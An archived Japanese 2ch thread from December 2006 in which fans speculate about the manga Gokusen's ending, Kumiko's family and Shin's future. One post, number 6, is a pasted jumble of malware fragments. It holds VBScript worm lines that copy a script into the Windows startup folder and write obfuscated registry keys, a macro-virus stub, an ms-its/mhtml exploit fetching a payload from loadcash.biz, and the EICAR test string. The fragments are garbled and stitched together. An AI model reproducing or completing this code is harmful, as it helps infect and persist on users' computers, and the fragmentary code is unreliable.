5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★【ごくせん】 森本梢子9 【研修医なな子】★

1 :ただいま好評連載中:2006/12/18(月) 00:31:10 ID:???0
『ごくせん』は 『YOU』(集英社)連載中。
 コミックスは14巻まで発売中。(06年12月現在)

★関連サイト★
internet YOU
ttp://you.shueisha.co.jp/
アニメ「ごくせん」
ttp://www.ntv.co.jp/a-gokusen/
ドラマ「ごくせん」
ttp://www.ntv.co.jp/gokusen/backnumber/index.html(02年)
ttp://www.ntv.co.jp/gokusen/(最新)

★その他作品★
『研修医なな子』 『私がママよ』

※※※※ネタバレに関しての注意※※※※※※※※※※※※※※※※※
本誌・コミックスその他関連書籍の発売日の正午にネタバレ解禁。
早バレはネタバレスレに書き込んだ後にここでの誘導を推奨。
解禁前のネタバレは自粛の方向でお願いします。強制ではありません。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※


関連スレ等は>>2へ。

2 :花と名無しさん:2006/12/18(月) 00:32:52 ID:???0
★過去スレ★

前スレ
★【ごくせん】森本梢子8【研修医なな子】★
http://comic6.2ch.net/test/read.cgi/gcomic/1154872050/

★【ごくせん】森本梢子7【研修医なな子】★
http://comic6.2ch.net/test/read.cgi/gcomic/1141503818/
★【ごくせん】森本梢子6【研修医なな子】★
http://comic6.2ch.net/test/read.cgi/gcomic/1118755590/
★【ごくせん】森本梢子5【研修医なな子】★
http://comic6.2ch.net/test/read.cgi/gcomic/1113214586/
★【ごくせん】森本梢子4【研修医なな子】★
http://comic6.2ch.net/test/read.cgi/gcomic/1109773729/
【ごくせん】森本梢子3【研修医なな子】
http://comic6.2ch.net/test/read.cgi/gcomic/1082221785/
★★★★  ごくせん 2 ★★★★
http://comic2.2ch.net/test/read.cgi/gcomic/1048300480/
★★★ごくせん★★★
http://comic.2ch.net/gcomic/kako/1015/10159/1015903683.html

3 :花と名無しさん:2006/12/18(月) 00:33:49 ID:???0
★関連スレ★

【白金】ごくせん 2代目【慎・クマ・うっちー・南・野田】 懐かしドラマ板
http://bubble4.2ch.net/test/read.cgi/natsudora/1155648430/
ごくせん 3時間目 アニメ2板
http://anime.2ch.net/test/read.cgi/anime2/1119532161/


★過去ログ倉庫★
ttp://takamatsu.cool.ne.jp/fightclub/gokusen/top.html
(保管人さん管理。2chサイトではありません。)

★wiki★
ttp://ja.wikipedia.org/wiki/%E3%81%94%E3%81%8F%E3%81%9B%E3%82%93

4 :花と名無しさん:2006/12/18(月) 02:20:45 ID:???O
4ゲトなら慎ちゃんが次回、漢を見せる!

1さんオツです!
おめぇさんは粋なお人だぁ

5 :花と名無しさん:2006/12/18(月) 04:48:42 ID:???O
1姐さん乙!

そうかもう新スレになるのか。
前スレは祭の祭wで一気に消費したキガス

6 :<body onload=window()>:2006/12/18(月) 07:40:58 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :花と名無しさん:2006/12/20(水) 22:51:45 ID:???0
即死防止のために・・・

次回はどうなると思う?この続きだとすると
●極道メインで篠原先生との別れ。
●学校メインで教職復帰。4組生徒と先生達とのふれあい。
●恋愛メインで慎とのいろいろ。大穴w

●新章、卒業式へ向けて。

8 :花と名無しさん:2006/12/20(水) 23:29:46 ID:???0
自分の道を歩くと決意した久美子の男前っぷりに
篠原先生が本気になる、という選択肢もアリかもしれないぞw

9 :花と名無しさん:2006/12/21(木) 00:35:06 ID:???0
それはないだろ。梢子さんだぞ。

10 :花と名無しさん:2006/12/21(木) 00:47:26 ID:???0
久美子の全て(跡継ぎ問題とか)を受け止めきれない男さんには
久美子はやれません。

11 :花と名無しさん:2006/12/21(木) 01:27:38 ID:???0
おー、その通りだー!
極道を離れて北海道に連れて行くならOKなんて甘いぞー!
本気になるなら黒田に残れー!

12 :花と名無しさん:2006/12/21(木) 02:57:31 ID:???0
ふんどし集団の中に慎ちゃんが居なかったことから
次回は祭り前夜になることを期待する…というより姐さん頼む!

13 :花と名無しさん:2006/12/21(木) 03:07:33 ID:???O
恋愛とまではいかなくてもいいから、
そろそろ慎が報われるような展開が見たい。
今までの祭は全部どこか切ないから切なくないのが良いんだが。

14 :花と名無しさん:2006/12/21(木) 09:35:07 ID:???O
祭あったの?誰かkwsk!

15 :花と名無しさん:2006/12/21(木) 10:25:32 ID:???0
>>11
しかし極道に残るよりも、久美子をあの環境から連れ出してあげる方が
一般的には正しいような気もする

16 :花と名無しさん:2006/12/21(木) 11:04:48 ID:???0
でも、黒田は大切な大切な家族だからねえ。

17 :花と名無しさん:2006/12/21(木) 12:52:35 ID:???O
なんだかんだ言いつつ久美子が黒田を捨てられないんじゃないかな。
久美子が教師やめるとしたら黒田関係しか考えられないよ。

18 :花と名無しさん:2006/12/21(木) 13:24:59 ID:???0
むしろ久美子の為に、黒田衆がカタギになったらいいんじゃない?

19 :花と名無しさん:2006/12/21(木) 14:23:04 ID:???0
まず、久美子が黒田から離れようとは考えてもないんじゃ?
だったら男の方がそれに近づくしかない。
最初から逃げ腰の篠原先生には無理なんだよ。
告ったんだって、北海道に連れて行ける時になったからであって。

20 :花と名無しさん:2006/12/21(木) 17:36:30 ID:???0
>>15
久美子が極道大嫌いで乱暴大嫌いで
つつましいおしとやかなお姉さん(ゆりっぺみたいな)なら
それもいいけどさ…

21 :花と名無しさん:2006/12/21(木) 18:35:50 ID:???0
もう篠原エンドはないな。

フンドシ生徒と天秤にかけられるようじゃ
久美子落とすのは相当時間かかりそうw

22 :花と名無しさん:2006/12/21(木) 19:58:17 ID:???0
久美子が残ることは確定したけど
最終回で「5年後──」みたいに場面展開して
北海道で先生とケコーンしてラブラブです♪
みたいなドンデン返しもないとは言い切れないから怖いw

23 :花と名無しさん:2006/12/21(木) 23:29:00 ID:???0
一度結論出したことを
ラストで説明もなくひっくり返すって…
素人の虹じゃあるまいし。

ななこのときは、結論は出てなかったからアリだったけど
いくらなんでも読者を馬鹿にしすぎるぞ。

24 :花と名無しさん:2006/12/22(金) 00:41:07 ID:???0
ネタにマジレス…

25 :花と名無しさん:2006/12/22(金) 00:59:57 ID:???0
たとえば、警察関係者が暴力団と結婚して後継ぎになる場合、
実家とは縁切りですか?
それとも親が警察を退職ですか?
どっちが現実的だろう・・

26 :花と名無しさん:2006/12/22(金) 01:21:33 ID:???0
両方じゃない?
黒田と養子縁組とかして沢田の籍を抜いても
刑事局長じゃヤバイでしょう、エリートっぽそうだし。
退職は免れても、更迭とか一警官に降格とか。

27 :花と名無しさん:2006/12/22(金) 03:45:33 ID:???0
実家を顧みずしがらみを断ち切って嫁ぐんだな慎は
正にヒロインの鏡w

28 :花と名無しさん:2006/12/22(金) 03:47:07 ID:???O
慎の親父さんて何歳?
慎が養子で黒田継ぐとしたらその頃には退職してるんじゃない?
少なくともあと十年はかかるだろうし。

しかしその頃だと久美子の年齢もヤバスw

29 :花と名無しさん:2006/12/22(金) 03:56:19 ID:???0
久美子は跡継ぎじゃないけど
やっぱり沢田父にも影響あるか…。
だよな…あるよな…
三親身以内に極道の親玉はマズイかw

30 :花と名無しさん:2006/12/22(金) 09:46:22 ID:???0
>>27
ものっそい萌えたw

31 :花と名無しさん:2006/12/22(金) 09:48:33 ID:???O
慎が沢田の家を出ても玲がいるから跡取りは心配ないけど
玲は警察官僚になる気じゃないの?パパよりそっちのがヤバス
極道弁護士なら…まだ何とかいける?

32 :花と名無しさん:2006/12/22(金) 10:13:11 ID:???0
怜かぁ。
父親は早期退職して夫婦で海外暮らしでもするとして
兄がいたか。

33 :花と名無しさん:2006/12/22(金) 11:47:38 ID:???0
最後のページで何か考え込んでいるおじいさんのコマが妙に意味ありげ
「組を解散する、だから久美子はもうヤクザの跡取り娘じゃねぇ!」って決心する
終わり方とか。

34 :花と名無しさん:2006/12/22(金) 12:44:49 ID:???0
後半はいいけど、解散まではしなくてもw
明確な4代目を据えたら済むんじゃ?京さんで。

35 :花と名無しさん:2006/12/22(金) 16:01:59 ID:???0
実家が極道でなければ先生を続けても「ごくせん」じゃ無くなるもんなぁ

36 :花と名無しさん:2006/12/22(金) 16:20:04 ID:???0
>>33
普通に
「先生…良く言った」
系だと思ってた。<おじいさん

37 :花と名無しさん:2006/12/22(金) 17:24:32 ID:???O
やはり京さんが四代目でいいだろ。
そもそも嫁いでも黒田慎じゃなく山口慎だし。

38 :花と名無しさん:2006/12/22(金) 17:28:07 ID:???0
すでに慎が嫁ぐことが前提になってるのがワロスw

39 :花と名無しさん:2006/12/22(金) 17:58:21 ID:???0
>>37
黒田一家なんだから、4代目は黒田姓にならないとw
久美子がおじいさんと養子縁組→慎が婿養子か
慎が結婚前におじいさんと養子縁組w

でも慎4代目は個人的に反対なんだけどな。
京さんがいい。梢子さん、慎は弁護士でヨロ。

40 :花と名無しさん:2006/12/23(土) 00:15:01 ID:???0
>>28
42歳。この年で警視庁刑事局長って
かなりのエリートじゃない?やばいねぇw

郷さんが拓殖するまであと20年、慎ちゃん辛抱しないと・・・・w

41 :花と名無しさん:2006/12/23(土) 00:27:28 ID:???0
×拓殖
○退職

間違えた・・・(´・ω・`)

42 :花と名無しさん:2006/12/23(土) 00:38:55 ID:???0
慎ちゃんが実は極道弁護士志望って聞いたら
久美子どんな反応するんかなー。

43 :花と名無しさん:2006/12/23(土) 01:18:17 ID:???O
久美子、慎が法学部行くって聞いて
警察官僚になる気かよ!?ってショック受けてたよね
むしろそれにビックリ。極道ならいいのかw

44 :花と名無しさん:2006/12/23(土) 11:30:15 ID:???0
>>40
42だと、学生結婚になるねw

45 :花と名無しさん:2006/12/23(土) 13:42:17 ID:???0
玲が19歳だから・・・確かに早いよねw
堅物そうに見えて。

46 :花と名無しさん:2006/12/24(日) 04:28:00 ID:???O
いろいろ妄想してしまうけど、
どのパターンも慎ちゃんが嫁ぐ展開しか浮かばないw
男らしくないわけじゃないのになぁ〜
やはり久美子が男前すぎるのがよくないのか?

47 :花と名無しさん:2006/12/24(日) 10:20:20 ID:???0
慎オタの頭がおかしいからでしょ

48 :花と名無しさん:2006/12/24(日) 17:14:21 ID:???0
久美子一人娘だしなー。
慎ちゃんは嫁にもらおうが婿に行こうが
こだわらないよね。

49 :花と名無しさん:2006/12/24(日) 17:34:27 ID:???0
山口家の一人娘であって
黒田家の一人娘じゃないところがミソ。だったりして。

50 :花と名無しさん:2006/12/26(火) 00:02:33 ID:???O
そうそう。
久美子が山口姓であるとこがね。
婿入りしても山口慎になるわけだ。
山口の親戚とかどうなってるんだろう。

51 :花と名無しさん:2006/12/26(火) 00:21:08 ID:???0
久美子っておじいさん以外に血縁者いたっけ?
いないと勝手に思っちゃってた。


・・・って、違うところに誤爆してしまった_| ̄|○

52 :花と名無しさん:2006/12/26(火) 00:38:12 ID:???0
山口父は、なんとなくゆりっぺと結婚した時に縁切られてるようなイマゲ。

53 :花と名無しさん:2006/12/26(火) 00:44:26 ID:???0
山口父側の親族が引き取っても良かったわけだしね。
縁切られてるのかな。
由梨子さん家出たのに厳しいなー

54 :花と名無しさん:2006/12/26(火) 01:05:49 ID:???0
久美子が孝介さんの娘かもしれないことが
関係してたりしてw

55 :花と名無しさん:2006/12/26(火) 01:24:39 ID:???0
もし山口祖母とうまくやってたんなら絶対久美子を引き取るよね。
極道嫌いで家出てきた嫁のことを考えたらなおさら。
そして久美子の事を考えておじいさんも山口祖母に託したはず。
そうならなかったと言うことは、
山口祖母がもういないか、縁を切られてるかのどっちかなんじゃないかなー。と思う。

56 :花と名無しさん:2006/12/26(火) 01:49:59 ID:???0
下世話な話になるけど、孝介さんが身に覚えがあるってことは
計算上久美子の父親の可能性があるってことで
もし山口父の娘だとしても、家を出てすぐに妊娠してるってことになるよね。

由梨子さんてそんな身持ち軽いように見えないんだけど
別れた男の子を身ごもってる女を見捨てておけなかったんだったりして>山口父
それなら縁切られるのも分かるし、引き取らないのも頷ける。

57 :花と名無しさん:2006/12/26(火) 02:06:01 ID:???0
ゆりっぺが家を出た時すでに山口父とはそういう仲だったって事か。

58 :花と名無しさん:2006/12/26(火) 03:42:14 ID:???O
え、そっち?w 二股?

59 :花と名無しさん:2006/12/26(火) 11:57:28 ID:???0
56にイッピョウ

60 :花と名無しさん:2006/12/26(火) 14:07:30 ID:???0
>>57
だって久美子の誕生日から計算して孝介さんに身に覚えがあるってことは
山口父と同時期に付き合いがあったってことでしょ。
それとも孝介さんがアフォすぎて10ヶ月の計算ができてないって事?
ゆりっぺが家を出てしばらくしてから山口父と出会ってケコーンだったら
孝介さんでは絶対にありえないし。

61 :花と名無しさん:2006/12/26(火) 14:08:26 ID:???0
ごめん60は58宛て

62 :花と名無しさん:2006/12/26(火) 16:50:02 ID:???0
>アフォすぎて10ヶ月の計算ができてない

ありえるから困る

63 :花と名無しさん:2006/12/26(火) 17:23:44 ID:???0
10ヶ月っていっても実質9ヶ月ちょい(280日±10日)くらいだよね。
最終月経開始日から妊娠周期を数えるってことも
知らない女の人もわりといる。男なら特に知らないんじゃ。
孝介さんの勘違いも十分有り得るかも。

64 :花と名無しさん:2006/12/26(火) 20:28:19 ID:???O
普通にそこはスルーで終わりそうw
孝介さんも久美子も、時どき思い出すくらいでいいとか言ってたし
うやむやのままで最終回になりそうだね

65 :花と名無しさん:2006/12/26(火) 22:37:56 ID:???0
ただでさえ極道とかかわるのなんかまっぴら御免なのに
腹の中に極道の落としだねが入ってたら
もう縁切るしかないわな<山口祖父母

66 :花と名無しさん:2006/12/26(火) 23:03:25 ID:???0
由梨子さんの残した日記の内容からして
黒田にいる時から孝介さんと山口父の両天秤はないと思うがなー
孝介さん勘違い&出会って即妊娠もないと思うし
この中では>>56が一番有り得そうな気がする
久美子と山口のお父さんってちっとも似てないし

67 :花と名無しさん:2006/12/26(火) 23:16:33 ID:???0
外見はおじいさんの隔世遺伝だと思っていた。

68 :花と名無しさん:2006/12/27(水) 00:34:36 ID:???0
昇り龍の血を色濃く受け継いでああなった、ってのが好きなので
父親は無害なカンジの山口父で個人的にFA。

69 :花と名無しさん:2006/12/27(水) 01:02:25 ID:???0
ここでFA出しても
梢子さんのことだから思いもよらないところから
強引(?)に結論持ってきそうだw
いつかのふんどしみたいに

70 :花と名無しさん:2006/12/27(水) 01:20:18 ID:???0
別にそれはそれでいいよ。
作者の好きにすればいい。

71 :花と名無しさん:2006/12/27(水) 03:02:43 ID:???O
実は孝介が父親だったとしたら今度は和田組の後継ぎ問題になる?
沢田慎か黒田慎か和田慎か…知りたいが知りたくないw

72 :花と名無しさん:2006/12/27(水) 03:28:35 ID:???0
やっぱり久美子と結婚する人が
四代目ってことなのかなー
”沢田慎”って響きが好きだから
個人的には黒田にも和田にもなってほしくないんだがw
ぞれにしても「田」が多いな。

73 :花と名無しさん:2006/12/27(水) 04:22:48 ID:???0
慎ちゃんに四代目はキツイだろうなぁ、と思う。

クラスメイトの信頼も厚いし頭になる素質は十分あるんだろうけど
久美子といるとどっちが組長なんだか、という展開になりそうで面白…怖いんだよねw

74 :花と名無しさん:2006/12/27(水) 11:07:50 ID:???0
久美子に敵わないもんね、ケンカ・・・
嫁に負けるような組長ってw
4代目より弁護士が似合ってると思う。頭脳戦で。

久美子も組長の孫ならともかく、極妻になってしまったら
さすがに学校にはいられないだろうし。

75 :花と名無しさん:2006/12/27(水) 11:41:01 ID:???0
早売りYOU売ってた。休載なのが悲しい〜

76 :花と名無しさん:2006/12/27(水) 14:51:18 ID:???0
流石に将来有望な教え子を、極道の世界に引っ張り込む教師っていうのは最悪だろうから
それはないと思うんだが

77 :花と名無しさん:2006/12/27(水) 15:15:11 ID:???0
エエー
バカなら引っ張り込んでいいのかよ…

78 :花と名無しさん:2006/12/27(水) 16:41:38 ID:???O
ってか無理矢理ならその通りだけど
慎の場合は自分から飛び込んでいく(予定)んじゃん。
引っ張りこんでるわけじゃあるまい。

79 :花と名無しさん:2006/12/27(水) 18:29:51 ID:???O
ごくせんって次号で終わりなの?クライマックスって…。最終章ならまだしも。


80 :花と名無しさん:2006/12/27(水) 18:39:35 ID:???0
見た見た_| ̄|○

いよいよ、ついに卒業の時がやってきた。
感動のクライマックス!

だって。最終回ではなさそうだけど
最終章あと3〜4回で終わりってところだろうね。

81 :花と名無しさん:2006/12/27(水) 18:48:32 ID:???0
>>78
久美子の存在自体が引っ張り込んでる理由だからな〜

82 :花と名無しさん:2006/12/27(水) 19:47:43 ID:???0
存在否定かよ

83 :花と名無しさん:2006/12/27(水) 20:17:44 ID:???0
久美子にしてみたら、勝手に惚れてきて
勝手に断りもなく進路決めて責められてもな。って感じだよな。
裏家業には関わるなって前に釘刺してるわけだし。

でも保護者にしてみたらタマランよね。
自分とこの優秀な子供がそそのかされたって思うだろうね。

84 :花と名無しさん:2006/12/28(木) 04:22:08 ID:???O
成人したら自分自身の人生だから。
親が一生面倒見るわけじゃないから。
自分自身で決めた強い意思があれば大丈夫だよ。

85 :花と名無しさん:2006/12/28(木) 05:56:08 ID:???O
そうは言っても、よりにもよって極道だからw
慎が成人しても近しい家族に極道モンが出てしまったら
家族の人生にも大きく影響するよ。特にお父さんは警察エリートだし。

86 :花と名無しさん:2006/12/28(木) 09:28:00 ID:???0
>>85
弁護士でも専属でついたら
極道モノと見らてしまうの?
篠原先生はそんなことなさそうだけど。

87 :花と名無しさん:2006/12/28(木) 09:48:10 ID:???0
久美子をかばって撃たれたとき
病院で周りの人から白い目で見られてたよね。
極道の弁護士なんかやってるからだって。

弁護士でも倫理的問題とかあるんじゃないのかなー

88 :花と名無しさん:2006/12/29(金) 00:33:43 ID:???0
>>86
なんちゃら組顧問弁護士とか、
なんちゃら真理教顧問弁護士って聞いて、
あなたなら仕事頼みたいと思う?

わたしゃ怖いよw


89 :花と名無しさん:2006/12/29(金) 01:21:40 ID:???0
それは偏見だ。

90 :花と名無しさん:2006/12/29(金) 01:53:11 ID:???O
実績と金銭面次第でどこ付きでもいいけどね。
丸山弁護士や橋下弁護士に頼むよりはいいw

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)